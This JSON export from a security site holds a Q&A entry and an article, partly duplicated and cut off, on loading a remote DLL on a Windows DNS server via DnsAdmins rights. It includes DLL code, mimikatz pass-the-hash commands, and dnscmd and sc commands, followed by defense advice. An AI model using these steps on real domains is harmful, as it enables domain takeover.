[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCXzyPJW9viYy4-54GKZnEXv7XmAMexYLqvy0y_DQ6XE":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},56,"How do you prepare a malicious DLL that will be loaded by the DNS service?","The DLL must export three functions: DnsPluginInitialize, DnsPluginCleanup, and DnsPluginQuery. For example, DnsPluginQuery can execute code like WinExec(\"calc.exe\", SW_SHOWNORMAL). You compile it with a .def file that lists these exports, then place the DLL on a network share accessible by the DNS server, such as \\\\domain\\SYSVOL\\scripts.","\u003Cp>The DLL must export three functions: DnsPluginInitialize, DnsPluginCleanup, and DnsPluginQuery. For example, DnsPluginQuery can execute code like WinExec(&quot;calc.exe&quot;, SW_SHOWNORMAL). You compile it with a .def file that lists these exports, then place the DLL on a network share accessible by the DNS server, such as \\\\domain\\SYSVOL\\scripts.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-remote-dll-loading-on-dns-server-using-dnscmd\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-do-you-prepare-a-malicious-dll-that-will-be-loaded-by-the-dns-service-1777485393558","DLL export functions, DnsPluginInitialize, DnsPluginQuery, payload, SYSVOL",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},15,"Domain Penetration - Remote DLL Loading on DNS Server Using dnscmd","domain-penetration-remote-dll-loading-on-dns-server-using-dnscmd","Learn how to remotely load DLLs on a DNS server using dnscmd and DnsAdmins privileges for domain penetration, with exploitation steps and defense recommendations.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A method disclosed by Shay Ber, which allows remote DLL loading on a DNS server using DNSAdmin privileges in a domain environment. This is not a vulnerability but can be used as a domain penetration technique. This article will organize this exploitation technique based on personal experience, add personal insights, and provide defense recommendations in line with the exploitation approach.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002F@esnesenon\u002Ffeature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Detailed exploitation method\u003C\u002Fli>\u003Cli>Defense strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Detailed Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>Prerequisites:\u003C\u002Fh4>\u003Cp>Obtained credentials or hashes of a user in the DnsAdmins, Domain Admins, or Enterprise Admins group within the domain\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Under default configuration, not only users within the DnsAdmins group, but also users within the Domain Admins or Enterprise Admins groups can\u003C\u002Fp>\u003Ch3>1. View users in key groups\u003C\u002Fh3>\u003Cp>View all groups:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the DnsAdmins group:\u003C\u002Fp>\u003Cp>Cannot use the net group command to view; you can use PowerView to view\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\PowerView.ps1\u003Cbr>Get-NetGroupMember -GroupName \"DNSAdmins\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the Domain Admins group:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \"Domain Admins\" \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the Enterprise Admins group:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \"Enterprise Admins\" \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Obtain passwords or hashes of key users\u003C\u002Fh3>\u003Cp>Need to obtain the password or hash of any user within the DnsAdmins, Domain Admins, or Enterprise Admins groups\u003C\u002Fp>\u003Ch3>3. Prepare Payload.dll\u003C\u002Fh3>\u003Cp>Three export functions need to be defined:\u003C\u002Fp>\u003Cul>\u003Cli>DnsPluginInitialize\u003C\u002Fli>\u003Cli>DnsPluginCleanup\u003C\u002Fli>\u003Cli>DnsPluginQuery\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For defining export functions, you can refer to the previously open-source project:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Here, the export functions are declared using a .def file. The test code is as follows:\u003C\u002Fp>\u003Cp>dllmain.cpp:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>DWORD WINAPI DnsPluginInitialize(PVOID a1, PVOID a2)\u003Cbr>{\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>DWORD WINAPI DnsPluginCleanup()\u003Cbr>{\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>DWORD WINAPI DnsPluginQuery(PVOID a1, PVOID a2, PVOID a3, PVOID a4)\u003Cbr>{\u003Cbr>\tWinExec(\"calc.exe\", SW_SHOWNORMAL);\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>BOOL APIENTRY DllMain(HMODULE hModule,\u003Cbr>\tDWORD  ul_reason_for_call,\u003Cbr>\tLPVOID lpReserved\u003Cbr>)\u003Cbr>{\u003Cbr>\tswitch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\tcase DLL_PROCESS_ATTACH:\u003Cbr>\tcase DLL_THREAD_ATTACH:\u003Cbr>\tcase DLL_THREAD_DETACH:\u003Cbr>\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\tbreak;\u003Cbr>\t}\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>.def file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>EXPORTS\u003Cbr>DnsPluginInitialize\u003Cbr>DnsPluginCleanup\u003Cbr>DnsPluginQuery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate testdns.dll\u003C\u002Fp>\u003Ch3>4. Location to save Payload.dll\u003C\u002Fh3>\u003Cp>Must be remotely accessible by the DNS server\u003C\u002Fp>\u003Cp>The domain shared folder SYSVOL can be used here, which is accessible by all domain users by default.\u003C\u002Fp>\u003Cp>For more details, refer to the previous article: 'Domain Penetration - Restoring Passwords Stored in Group Policies Using SYSVOL'.\u003C\u002Fp>\u003Cp>My test domain environment is named test.com, and the domain shared folder path used is: \\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fp>\u003Ch3>5. Prepare dnsadmin\u003C\u002Fh3>\u003Cp>Typically, Windows hosts within the domain do not support the dnsadmin command.\u003C\u002Fp>\u003Cp>Default installed systems:\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fcc772069(v=ws.11)\u003C\u002Fp>\u003Cp>The Win7 system requires the installation of Remote Server Administration Tools (RSAT) for use.\u003C\u002Fp>\u003Cp>This section describes the method to execute the dnscmd command on a system without Remote Server Administration Tools (RSAT) installed:\u003C\u002Fp>\u003Ch4>(1) Save dnscmd.exe under C:\\Windows\\System32\u003C\u002Fh4>\u003Cp>Available download address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(2) Save dnscmd.exe.mui under C:\\Windows\\System32\\en-US\u003C\u002Fh4>\u003Cp>Available download address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>dnscmd.exe and dnscmd.exe.mui were obtained from my test system (Windows Server 2008 R2 x64)\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Domain Penetration – Retrieving DNS Records'\u003C\u002Fp>\u003Ch3>6. Start dnscmd\u003C\u002Fh3>\u003Cp>dnscmd does not support the function of inputting credentials for remote operations; here, the Over pass the hash feature of mimikatz is required\u003C\u002Fp>\u003Cp>The test environment has obtained key user information as follows:\u003C\u002Fp>\u003Cp>Username: Administrator\u003C\u002Fp>\u003Cp>Password: DomainAdmin456!\u003C\u002Fp>\u003Cp>Hash: A55E0720F0041193632A58E007624B40\u003C\u002Fp>\u003Cp>Execute in command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will launch a cmd.exe window, execute the dnscmd command within it\u003C\u002Fp>\u003Cp>Automated input can also be implemented:\u003C\u002Fp>\u003Cp>Execute in command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40 \u002Frun:\\\"cmd.exe \u002Fc c:\\test\\1.bat\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save dnscmd commands in c:\\test\\1.bat\u003C\u002Fp>\u003Ch3>7. Using the dnscmd command\u003C\u002Fh3>\u003Cp>DNS server IP: 192.168.10.1\u003C\u002Fp>\u003Cp>Command line execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dnscmd 192.168.10.1 \u002Fconfig \u002Fserverlevelplugindll \\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For the DNS server, this will create a new registry entry\u003C\u002Fp>\u003Cp>Location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cul>\u003Cli>ServerLevelPluginDll\u003C\u002Fli>\u003Cli>REG_SZ\u003C\u002Fli>\u003Cli>\\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>8. The DLL will be loaded after restarting the DNS service\u003C\u002Fh3>\u003Cp>Wait for the DNS server to restart\u003C\u002Fp>\u003Cp>Or restart the DNS server remotely:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc \\\\192.168.10.1 stop dns\u003Cbr>sc \\\\192.168.10.1 start dns\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The background process of the DNS server is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019774258_0_5faafe93a4.jpeg\">\u003C\u002Fp>\u003Cp>dns.exe will call testdns.dll multiple times with System privileges\u003C\u002Fp>\u003Ch3>9. Practical Exploitation\u003C\u002Fh3>\u003Cp>In real environments, the DNS server and domain controller are often the same host\u003C\u002Fp>\u003Ch2>0x03 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Control Permissions\u003C\u002Fh3>\u003Cp>Prevent critical user credentials from being obtained by attackers\u003C\u002Fp>\u003Cp>PowerView can be used here to check which hosts critical users have logged into\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\PowerView.ps1\u003Cbr>Invoke-UserHunter -UserName AdministratorUser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Monitor and Configure Registry\u003C\u002Fh3>\u003Cp>Location: KEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cp>When using dnscmd to remotely load DLLs on DNS servers, registry modifications are made with System privileges. Modifying the ACL (Access Control List) of registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ and removing the Set Value permission for System users can prevent exploitation of this method\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019786375_1_27143f0f19.jpeg\">\u003C\u002Fp>\u003Cp>However, this may affect other normal functions. Other key-value information under this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\u003Cbr>    GlobalQueryBlockList    REG_MULTI_SZ    wpad\\0isatap\u003Cbr>    EnableGlobalQueryBlockList    REG_DWORD    0x1\u003Cbr>    PreviousLocalHostname    REG_SZ    WIN-F08C969D7FM.test.com\u003Cbr>    BootMethod    REG_DWORD    0x3\u003Cbr>    AdminConfigured    REG_DWORD    0x1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. View logs\u003C\u002Fh3>\u003Ch4>(1) Record DNS service startup and shutdown\u003C\u002Fh4>\u003Cp>Location: Application and Services Logs-&gt;DNS Server\u003C\u002Fp>\u003Cp>Command line view:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wevtutil qe \"dns server\" \u002Frd:true \u002Ff:text\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>ID 2 indicates DNS service startup, ID 4 indicates DNS service shutdown\u003C\u002Fp>\u003Ch4>(2) Record DLL addition operations\u003C\u002Fh4>\u003Cp>Requires enhanced DNS logging and diagnostic features, supported by default in Server 2016, Server 2012 requires patch 2956577 installation\u003C\u002Fp>\u003Cp>Reference documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fdn800669(v=ws.11)\u003C\u002Fp>\u003Cp>Patch notes:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2956577\u002Fupdate-adds-query-logging-and-change-auditing-to-windows-dns-servers\u003C\u002Fp>\u003Cp>Patch download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.catalog.update.microsoft.com\u002FSearch.aspx?q=2956577\u003C\u002Fp>\u003Cp>Adding a DLL operation generates a log with ID 541.\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of remotely loading DLLs on DNS servers using dnscmd, combining exploitation ideas to provide defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A method disclosed by Shay Ber, which allows remote DLL loading on a DNS server using DNSAdmin privileges in a domain environment. This is not a vulnerability but can be used as a domain penetration technique. This article will organize this exploitation technique based on personal experience, add personal insights, and provide defense recommendations in line with the exploitation approach.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002F@esnesenon\u002Ffeature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Detailed exploitation method\u003C\u002Fli>\u003Cli>Defense strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Detailed Exploitation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>Prerequisites:\u003C\u002Fh4>\u003Cp>Obtained credentials or hashes of a user in the DnsAdmins, Domain Admins, or Enterprise Admins group within the domain\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Under default configuration, not only users within the DnsAdmins group, but also users within the Domain Admins or Enterprise Admins groups can\u003C\u002Fp>\u003Ch3>1. View users in key groups\u003C\u002Fh3>\u003Cp>View all groups:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the DnsAdmins group:\u003C\u002Fp>\u003Cp>Cannot use the net group command to view; you can use PowerView to view\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\PowerView.ps1\u003Cbr>Get-NetGroupMember -GroupName \"DNSAdmins\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the Domain Admins group:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \"Domain Admins\" \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View users in the Enterprise Admins group:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net group \"Enterprise Admins\" \u002Fdomain\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Obtain passwords or hashes of key users\u003C\u002Fh3>\u003Cp>Need to obtain the password or hash of any user within the DnsAdmins, Domain Admins, or Enterprise Admins groups\u003C\u002Fp>\u003Ch3>3. Prepare Payload.dll\u003C\u002Fh3>\u003Cp>Three export functions need to be defined:\u003C\u002Fp>\u003Cul>\u003Cli>DnsPluginInitialize\u003C\u002Fli>\u003Cli>DnsPluginCleanup\u003C\u002Fli>\u003Cli>DnsPluginQuery\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For defining export functions, you can refer to the previously open-source project:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Here, the export functions are declared using a .def file. The test code is as follows:\u003C\u002Fp>\u003Cp>dllmain.cpp:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>DWORD WINAPI DnsPluginInitialize(PVOID a1, PVOID a2)\u003Cbr>{\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>DWORD WINAPI DnsPluginCleanup()\u003Cbr>{\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>DWORD WINAPI DnsPluginQuery(PVOID a1, PVOID a2, PVOID a3, PVOID a4)\u003Cbr>{\u003Cbr>\tWinExec(\"calc.exe\", SW_SHOWNORMAL);\u003Cbr>\treturn 0;\u003Cbr>}\u003Cbr>\u003Cbr>BOOL APIENTRY DllMain(HMODULE hModule,\u003Cbr>\tDWORD  ul_reason_for_call,\u003Cbr>\tLPVOID lpReserved\u003Cbr>)\u003Cbr>{\u003Cbr>\tswitch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\tcase DLL_PROCESS_ATTACH:\u003Cbr>\tcase DLL_THREAD_ATTACH:\u003Cbr>\tcase DLL_THREAD_DETACH:\u003Cbr>\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\tbreak;\u003Cbr>\t}\u003Cbr>\treturn TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>.def file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>EXPORTS\u003Cbr>DnsPluginInitialize\u003Cbr>DnsPluginCleanup\u003Cbr>DnsPluginQuery\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile to generate testdns.dll\u003C\u002Fp>\u003Ch3>4. Location to save Payload.dll\u003C\u002Fh3>\u003Cp>Must be remotely accessible by the DNS server\u003C\u002Fp>\u003Cp>The domain shared folder SYSVOL can be used here, which is accessible by all domain users by default.\u003C\u002Fp>\u003Cp>For more details, refer to the previous article: 'Domain Penetration - Restoring Passwords Stored in Group Policies Using SYSVOL'.\u003C\u002Fp>\u003Cp>My test domain environment is named test.com, and the domain shared folder path used is: \\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fp>\u003Ch3>5. Prepare dnsadmin\u003C\u002Fh3>\u003Cp>Typically, Windows hosts within the domain do not support the dnsadmin command.\u003C\u002Fp>\u003Cp>Default installed systems:\u003C\u002Fp>\u003Cul>\u003Cli>Windows Server 2003\u003C\u002Fli>\u003Cli>Windows Server 2008\u003C\u002Fli>\u003Cli>Windows Server 2003 R2\u003C\u002Fli>\u003Cli>Windows Server 2008 R2\u003C\u002Fli>\u003Cli>Windows Server 2012\u003C\u002Fli>\u003Cli>Windows Server 2003 with SP1\u003C\u002Fli>\u003Cli>...\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fit-pro\u002Fwindows-server-2012-R2-and-2012\u002Fcc772069(v=ws.11)\u003C\u002Fp>\u003Cp>The Win7 system requires the installation of Remote Server Administration Tools (RSAT) for use.\u003C\u002Fp>\u003Cp>This section describes the method to execute the dnscmd command on a system without Remote Server Administration Tools (RSAT) installed:\u003C\u002Fp>\u003Ch4>(1) Save dnscmd.exe under C:\\Windows\\System32\u003C\u002Fh4>\u003Cp>Available download address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(2) Save dnscmd.exe.mui under C:\\Windows\\System32\\en-US\u003C\u002Fh4>\u003Cp>Available download address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>dnscmd.exe and dnscmd.exe.mui were obtained from my test system (Windows Server 2008 R2 x64)\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Domain Penetration – Retrieving DNS Records'\u003C\u002Fp>\u003Ch3>6. Start dnscmd\u003C\u002Fh3>\u003Cp>dnscmd does not support the function of inputting credentials for remote operations; here, the Over pass the hash feature of mimikatz is required\u003C\u002Fp>\u003Cp>The test environment has obtained key user information as follows:\u003C\u002Fp>\u003Cp>Username: Administrator\u003C\u002Fp>\u003Cp>Password: DomainAdmin456!\u003C\u002Fp>\u003Cp>Hash: A55E0720F0041193632A58E007624B40\u003C\u002Fp>\u003Cp>Execute in command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This will launch a cmd.exe window, execute the dnscmd command within it\u003C\u002Fp>\u003Cp>Automated input can also be implemented:\u003C\u002Fp>\u003Cp>Execute in command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"sekurlsa::pth \u002Fuser:Administrator \u002Fdomain:test.com \u002Fntlm:A55E0720F0041193632A58E007624B40 \u002Frun:\\\"cmd.exe \u002Fc c:\\test\\1.bat\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save dnscmd commands in c:\\test\\1.bat\u003C\u002Fp>\u003Ch3>7. Using the dnscmd command\u003C\u002Fh3>\u003Cp>DNS server IP: 192.168.10.1\u003C\u002Fp>\u003Cp>Command line execution:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dnscmd 192.168.10.1 \u002Fconfig \u002Fserverlevelplugindll \\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For the DNS server, this will create a new registry entry\u003C\u002Fp>\u003Cp>Location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cul>\u003Cli>ServerLevelPluginDll\u003C\u002Fli>\u003Cli>REG_SZ\u003C\u002Fli>\u003Cli>\\\\test.com\\SYSVOL\\test.com\\scripts\\testdns.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>8. The DLL will be loaded after restarting the DNS service\u003C\u002Fh3>\u003Cp>Wait for the DNS server to restart\u003C\u002Fp>\u003Cp>Or restart the DNS server remotely:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc \\\\192.168.10.1 stop dns\u003Cbr>sc \\\\192.168.10.1 start dns\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The background process of the DNS server is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019774258_0_5faafe93a4-1.jpeg\">\u003C\u002Fp>\u003Cp>dns.exe will call testdns.dll multiple times with System privileges\u003C\u002Fp>\u003Ch3>9. Practical Exploitation\u003C\u002Fh3>\u003Cp>In real environments, the DNS server and domain controller are often the same host\u003C\u002Fp>\u003Ch2>0x03 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Control Permissions\u003C\u002Fh3>\u003Cp>Prevent critical user credentials from being obtained by attackers\u003C\u002Fp>\u003Cp>PowerView can be used here to check which hosts critical users have logged into\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\PowerView.ps1\u003Cbr>Invoke-UserHunter -UserName AdministratorUser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Monitor and Configure Registry\u003C\u002Fh3>\u003Cp>Location: KEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cp>When using dnscmd to remotely load DLLs on DNS servers, registry modifications are made with System privileges. Modifying the ACL (Access Control List) of registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ and removing the Set Value permission for System users can prevent exploitation of this method\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019786375_1_27143f0f19-1.jpeg\">\u003C\u002Fp>\u003Cp>However, this may affect other normal functions. Other key-value information under this registry entry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\u003Cbr>    GlobalQueryBlockList    REG_MULTI_SZ    wpad\\0isatap\u003Cbr>    EnableGlobalQueryBlockList    REG_DWORD    